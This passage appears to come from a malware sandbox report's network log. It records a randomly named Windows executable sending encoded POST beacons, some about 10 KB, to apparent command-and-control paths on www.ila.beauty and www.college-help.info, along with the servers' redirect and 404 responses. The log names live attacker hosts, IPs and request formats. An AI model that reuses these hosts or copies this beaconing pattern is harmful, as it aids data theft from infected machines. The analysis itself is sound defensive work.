                                                                                                      33192.168.2.45004013.248.169.48805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:54.490855932 CEST709OUTPOST /izfe/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      Origin: http://www.ila.beauty
                                                                                                      Referer: http://www.ila.beauty/izfe/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 74 50 36 49 2f 57 4d 71 2f 67 56 45 35 59 4a 61 51 45 38 48 66 65 43 6b 55 42 68 66 71 50 30 36 76 4b 6b 70 6d 6a 6e 4c 2f 77 71 43 74 34 50 6e 52 6f 73 76 48 42 72 5a 49 62 47 45 6a 44 70 2f 4a 49 6e 2f 78 54 77 52 79 32 75 56 48 70 56 66 55 42 46 74 70 73 77 56 5a 52 73 31 67 4a 2b 67 69 58 50 69 68 66 50 2b 2b 79 77 58 51 73 44 74 6a 64 4d 5a 70 4f 46 4a 55 74 49 66 6a 32 52 63 4d 6b 45 61 43 59 7a 75 65 67 6b 39 70 79 34 47 63 76 34 4e 4d 6f 72 72 6b 52 66 4a 58 61 45 68 32 2f 64 51 56 53 7a 43 6a 58 72 4c 57 59 43 4f 2f 42 32 4d 4a 51 3d 3d
                                                                                                      Data Ascii: _XPD90E=Uo5VWlPpoEXKtP6I/WMq/gVE5YJaQE8HfeCkUBhfqP06vKkpmjnL/wqCt4PnRosvHBrZIbGEjDp/JIn/xTwRy2uVHpVfUBFtpswVZRs1gJ+giXPihfP++ywXQsDtjdMZpOFJUtIfj2RcMkEaCYzuegk9py4Gcv4NMorrkRfJXaEh2/dQVSzCjXrLWYCO/B2MJQ==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      34192.168.2.45004113.248.169.48805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:57.075201035 CEST729OUTPOST /izfe/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      Origin: http://www.ila.beauty
                                                                                                      Referer: http://www.ila.beauty/izfe/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 2f 39 75 49 39 31 30 71 6f 77 56 44 67 6f 4a 61 61 6b 38 44 66 65 2b 6b 55 46 59 55 70 38 41 36 76 76 41 70 70 43 6e 4c 36 77 71 43 6d 59 50 69 56 6f 73 53 48 47 69 75 49 65 47 45 6a 43 4e 2f 4a 4b 76 2f 74 31 34 51 79 6d 75 58 53 35 56 52 62 68 46 74 70 73 77 56 5a 52 6f 62 67 4a 47 67 69 6d 2f 69 69 36 37 39 34 43 77 59 52 73 44 74 77 4e 4e 65 70 4f 46 2f 55 6f 51 6d 6a 77 64 63 4d 6b 30 61 42 4b 62 74 48 51 6c 32 6e 53 34 52 5a 4e 52 57 46 35 75 55 75 41 32 70 58 2b 56 5a 7a 35 51 4b 45 6a 53 56 78 58 50 34 4c 66 4c 36 79 43 4c 46 53 52 4b 47 2b 74 6e 5a 6f 46 66 41 50 62 61 41 42 6b 67 44 64 66 30 3d
                                                                                                      Data Ascii: _XPD90E=Uo5VWlPpoEXK/9uI910qowVDgoJaak8Dfe+kUFYUp8A6vvAppCnL6wqCmYPiVosSHGiuIeGEjCN/JKv/t14QymuXS5VRbhFtpswVZRobgJGgim/ii6794CwYRsDtwNNepOF/UoQmjwdcMk0aBKbtHQl2nS4RZNRWF5uUuA2pX+VZz5QKEjSVxXP4LfL6yCLFSRKG+tnZoFfAPbaABkgDdf0=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      35192.168.2.45004213.248.169.48805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:59.729607105 CEST10811OUTPOST /izfe/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      Origin: http://www.ila.beauty
                                                                                                      Referer: http://www.ila.beauty/izfe/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 2f 39 75 49 39 31 30 71 6f 77 56 44 67 6f 4a 61 61 6b 38 44 66 65 2b 6b 55 46 59 55 70 39 34 36 76 39 49 70 6d 41 50 4c 39 77 71 43 6c 59 50 6a 56 6f 73 44 48 41 4b 71 49 65 44 2f 6a 41 46 2f 4a 76 37 2f 39 41 59 51 6e 57 75 58 51 35 56 51 55 42 46 43 70 71 51 52 5a 51 59 62 67 4a 47 67 69 6c 6e 69 31 2f 50 39 6a 43 77 58 51 73 44 62 6a 64 4e 36 70 4f 63 4b 55 6f 63 70 69 41 39 63 4d 41 51 61 48 35 7a 74 4f 51 6c 30 79 53 35 55 5a 4e 4e 7a 46 39 50 6e 75 41 7a 2b 58 35 6c 5a 2b 76 74 55 42 78 69 51 74 47 65 6e 4a 59 6a 52 39 44 61 48 53 7a 43 52 30 65 2f 37 71 78 72 4a 44 62 48 37 45 58 67 47 45 6f 59 33 33 48 36 7a 47 69 76 48 63 51 37 66 79 54 6c 31 47 68 66 34 4d 65 34 65 65 56 72 48 32 47 43 50 37 72 6a 4b 68 71 6b 6f 48 49 38 47 51 4c 55 4b 4e 38 2b 70 37 78 4f 33 31 6f 54 6c 61 45 69 75 66 68 66 49 71 61 54 4a 76 6c 2f 4d 4a 71 44 35 4d 41 6b 2f 76 49 79 34 56 7a 4c 64 4e 71 57 4a 79 73 32 55 6c 36 2f 42 48 33 71 6c 7a 59 6f 6c 56 6d [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=Uo5VWlPpoEXK/9uI910qowVDgoJaak8Dfe+kUFYUp946v9IpmAPL9wqClYPjVosDHAKqIeD/jAF/Jv7/9AYQnWuXQ5VQUBFCpqQRZQYbgJGgilni1/P9jCwXQsDbjdN6pOcKUocpiA9cMAQaH5ztOQl0yS5UZNNzF9PnuAz+X5lZ+vtUBxiQtGenJYjR9DaHSzCR0e/7qxrJDbH7EXgGEoY33H6zGivHcQ7fyTl1Ghf4Me4eeVrH2GCP7rjKhqkoHI8GQLUKN8+p7xO31oTlaEiufhfIqaTJvl/MJqD5MAk/vIy4VzLdNqWJys2Ul6/BH3qlzYolVmEW5rGeSv2L2peL4A3pHz1WaxKyozVo5LgZOGZ/YOZG+k9gJ+OI1GGhliEaPCItVnERL7nZX1YRQ8bE+kdnRqNX3PxLfi+e1L4XUpExkL/zXUjPUbqEHeewLB13wKvaAYfVX7Pss0aIxrJ5X0O46hAUnXXCy/6vD60arMLG7EusZxG5/pC+XwQIjpVmK+tJullDjrV2veY2WMFqwzOSORWquUe5+u6SCIPJpOsCBF80YnB1d1rb6nxt+HCJBLrjqMMuHEWVr0gZGNXZfWD+j0wOjQIIf9bWcvIldNSME4S091eBq1rvzehNPCy0HeYbn8UvlwryhkYQwFeULlya1eN3g6UJ270o+m5ro6ew07b0KY3srrIvdsRgsphnmIuhOEPRxfzH8gMS20WiXYi0wiRku6m/bxLSeujl8qtqTiD6I3S2FNJ1OLMIyPNhcbg/jVHngsOjPpnWyD0AEXCEUy4Fw0JXCLeze0K6/En7d20DJYXhVC8+k6HNx5ddsQA4i2CcHHux7fPotOiwGRoQ8A5KhiYoBhLqWE2LLaJfkjSSinqcMF6dtWaIKu1DfBbnUfVQwbZgQFKioykB22LteOzc/fC1MPwDbn32lHBEU7q9GVtr5lTbvJ62N/Y1F7JdfPVg565TIVzquQhvuuJz6uyxd4vNuU0wcdmA [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      36192.168.2.45004313.248.169.48805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:02.327716112 CEST448OUTGET /izfe/?_XPD90E=ZqR1VSau/njxt8yVh1Y7o1xJ67xnVWQPWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h12nFCEf6h8WT1ssqtMI1FtouyVgynF3e/12Wg=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.ila.beauty
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:03.044328928 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:07:02 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5f 58 50 44 39 30 45 3d 5a 71 52 31 56 53 61 75 2f 6e 6a 78 74 38 79 56 68 31 59 37 6f 31 78 4a 36 37 78 6e 56 57 51 50 57 4b 2b 6f 46 51 63 56 71 73 55 75 37 64 45 4e 6d 77 61 55 6f 47 4c 53 73 35 76 79 53 34 46 68 51 47 47 6c 42 36 72 38 68 48 74 77 54 59 66 4b 38 68 31 32 6e 46 43 45 66 36 68 38 57 54 31 73 73 71 74 4d 49 31 46 74 6f 75 79 56 67 79 6e 46 33 65 2f 31 32 57 67 3d 26 71 70 3d 71 54 5a 38 74 32 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_XPD90E=ZqR1VSau/njxt8yVh1Y7o1xJ67xnVWQPWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h12nFCEf6h8WT1ssqtMI1FtouyVgynF3e/12Wg=&qp=qTZ8t28"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      37192.168.2.45004438.88.82.56805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:08.754178047 CEST730OUTPOST /lk0h/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      Origin: http://www.college-help.info
                                                                                                      Referer: http://www.college-help.info/lk0h/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 70 6b 5a 35 33 43 70 46 75 69 66 4d 36 47 56 62 55 66 66 6b 67 4c 63 56 74 78 7a 53 53 2f 6b 62 4c 56 6a 39 53 57 73 75 42 36 61 75 4f 69 79 76 74 67 55 41 73 68 76 74 67 46 77 71 2f 59 4b 70 4d 5a 69 68 41 58 76 69 6f 54 47 31 4d 49 38 58 52 58 50 4e 6d 5a 30 56 41 65 2b 49 47 33 47 30 54 74 69 4b 2f 71 79 72 6c 7a 30 57 6f 55 66 46 67 4f 45 34 6f 46 54 78 4f 63 63 4b 46 2f 6e 63 71 71 51 7a 6f 2f 30 31 44 58 2f 6c 6d 64 64 53 36 49 65 45 2f 66 46 56 69 66 32 59 47 4f 65 59 4a 46 6e 37 78 79 55 78 31 63 54 36 65 31 5a 37 41 76 38 63 45 41 3d 3d
                                                                                                      Data Ascii: _XPD90E=3iLjkEAo5UEVpkZ53CpFuifM6GVbUffkgLcVtxzSS/kbLVj9SWsuB6auOiyvtgUAshvtgFwq/YKpMZihAXvioTG1MI8XRXPNmZ0VAe+IG3G0TtiK/qyrlz0WoUfFgOE4oFTxOccKF/ncqqQzo/01DX/lmddS6IeE/fFVif2YGOeYJFn7xyUx1cT6e1Z7Av8cEA==
                                                                                                      Oct 22, 2024 09:07:09.452936888 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:09 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:09.452990055 CEST185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.45004538.88.82.56805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:11.293164015 CEST750OUTPOST /lk0h/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      Origin: http://www.college-help.info
                                                                                                      Referer: http://www.college-help.info/lk0h/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 72 48 52 35 6e 52 42 46 76 43 66 4c 35 47 56 62 66 2f 66 6f 67 4c 51 56 74 31 72 43 53 4e 51 62 4b 31 54 39 44 6b 49 75 43 36 61 75 46 43 79 71 7a 51 56 4d 73 68 6a 66 67 48 6b 71 2f 5a 71 70 4d 63 47 68 41 6b 48 6a 70 44 47 33 45 6f 38 56 66 33 50 4e 6d 5a 30 56 41 66 62 64 47 33 75 30 53 63 53 4b 2f 4c 79 6f 6f 54 30 58 2b 45 66 46 78 65 45 38 6f 46 53 4c 4f 5a 45 73 46 36 72 63 71 72 41 7a 6f 75 30 71 4b 58 2f 6e 6c 74 64 47 2b 34 44 4a 6d 61 67 35 71 38 4b 33 41 74 2b 35 46 6a 71 68 67 44 31 6d 6e 63 33 4a 44 79 51 50 4e 73 42 56 66 4e 77 69 53 6b 62 36 76 50 6a 6e 75 36 67 30 2b 49 64 47 42 55 59 3d
                                                                                                      Data Ascii: _XPD90E=3iLjkEAo5UEVrHR5nRBFvCfL5GVbf/fogLQVt1rCSNQbK1T9DkIuC6auFCyqzQVMshjfgHkq/ZqpMcGhAkHjpDG3Eo8Vf3PNmZ0VAfbdG3u0ScSK/LyooT0X+EfFxeE8oFSLOZEsF6rcqrAzou0qKX/nltdG+4DJmag5q8K3At+5FjqhgD1mnc3JDyQPNsBVfNwiSkb6vPjnu6g0+IdGBUY=
                                                                                                      Oct 22, 2024 09:07:11.983941078 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:11 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:11.983952999 CEST185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      39192.168.2.45004638.88.82.56805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:13.905544043 CEST10832OUTPOST /lk0h/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      Origin: http://www.college-help.info
                                                                                                      Referer: http://www.college-help.info/lk0h/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 72 48 52 35 6e 52 42 46 76 43 66 4c 35 47 56 62 66 2f 66 6f 67 4c 51 56 74 31 72 43 53 4e 6f 62 4c 45 7a 39 53 30 30 75 44 36 61 75 49 69 79 52 7a 51 55 57 73 68 37 62 67 48 34 51 2f 64 61 70 4e 2f 2b 68 47 56 48 6a 69 44 47 33 49 49 38 55 52 58 50 59 6d 5a 6b 52 41 66 4c 64 47 33 75 30 53 65 4b 4b 35 61 79 6f 71 54 30 57 6f 55 66 52 67 4f 46 70 6f 42 32 78 4f 5a 77 6a 46 4a 6a 63 71 4c 77 7a 72 63 63 71 46 58 2f 68 73 39 63 42 2b 34 4f 4a 6d 65 41 44 71 39 2b 64 41 71 4f 35 56 30 62 72 6c 6a 45 37 31 4d 62 52 41 31 4d 2f 4c 61 42 75 47 74 63 62 66 52 61 6a 31 2b 6e 6b 68 4b 35 63 38 36 6c 36 64 68 46 6b 48 56 6e 58 42 5a 57 73 5a 66 54 32 51 73 6e 4b 39 2b 66 51 2b 75 50 31 4f 37 55 2f 46 62 35 63 58 6b 2b 52 45 6c 48 70 32 6d 57 55 45 36 6d 79 63 58 54 35 56 6b 2f 43 70 46 44 61 4a 30 56 56 54 48 67 63 4d 76 43 65 6b 45 38 50 2f 4e 57 53 77 72 48 4e 77 39 49 44 64 79 79 37 30 30 58 50 42 6d 64 6e 44 4f 45 65 4f 53 56 4e 67 4e 52 57 4b 54 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=3iLjkEAo5UEVrHR5nRBFvCfL5GVbf/fogLQVt1rCSNobLEz9S00uD6auIiyRzQUWsh7bgH4Q/dapN/+hGVHjiDG3II8URXPYmZkRAfLdG3u0SeKK5ayoqT0WoUfRgOFpoB2xOZwjFJjcqLwzrccqFX/hs9cB+4OJmeADq9+dAqO5V0brljE71MbRA1M/LaBuGtcbfRaj1+nkhK5c86l6dhFkHVnXBZWsZfT2QsnK9+fQ+uP1O7U/Fb5cXk+RElHp2mWUE6mycXT5Vk/CpFDaJ0VVTHgcMvCekE8P/NWSwrHNw9IDdyy700XPBmdnDOEeOSVNgNRWKT2PU2Nv2DiI67TCZmMhFKUcoXqadcLkxeQFs7coYXAcvwjU0BpRBf0QBgUnXCIdnib0I/saVKr6m5FsctKIkni+XO/NdcBYduXSsGsETp6RTKRTNDMySOZ2CfSm6TXNnQGmFBfvHgOPEyu3VAR3P2L4+YDr/wGI0owWS+2hokwcUiWXC8qqZQ6rvKSz3djUJB9ivWxfrQqyZFH2vJI8OITDPE3QwTtW85SZlwouwNg/T1fpNGV82hjLB4Snzd0QE9s2F3e+e1rLNb5MEe/enRbNs4la1E8XXYmMdWQ+UQ6v6edJBgPDKpicwitwIgVxOmQtLcSjnHFLQeT0ye7yahVV+W6zsPi4LwN/zeE2KeSNnqwHubJ4ZFW1OK4QP4lCf8t/JMefXmEaLmhy3wuKnFNpjQ/CPaIBUyAjI+mBxMmXqeMZvdJZMiz+d4HavIxXF05vnZvqSZ4cCoLG/5JF9/yo+djGvX3wzwS9tN45MvEJVVCg01Aqwu6UKgzm4leYWeO2V283oDG2JgvJFK2CynZL3hoaT1bds6FdjnMLIiFOr0XgPtUwKz5avdRafTOXwlPzFchHw1leCikbPmHLUH9lJTzDpWJdh2ZVNqfYPAgwt9rz5JwbXHcIjKOn4W4kJnv9Mlkq/PofZCMEA+NpY2xcaK2GKhM1BpYY [TRUNCATED]
                                                                                                      Oct 22, 2024 09:07:14.565916061 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:14 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
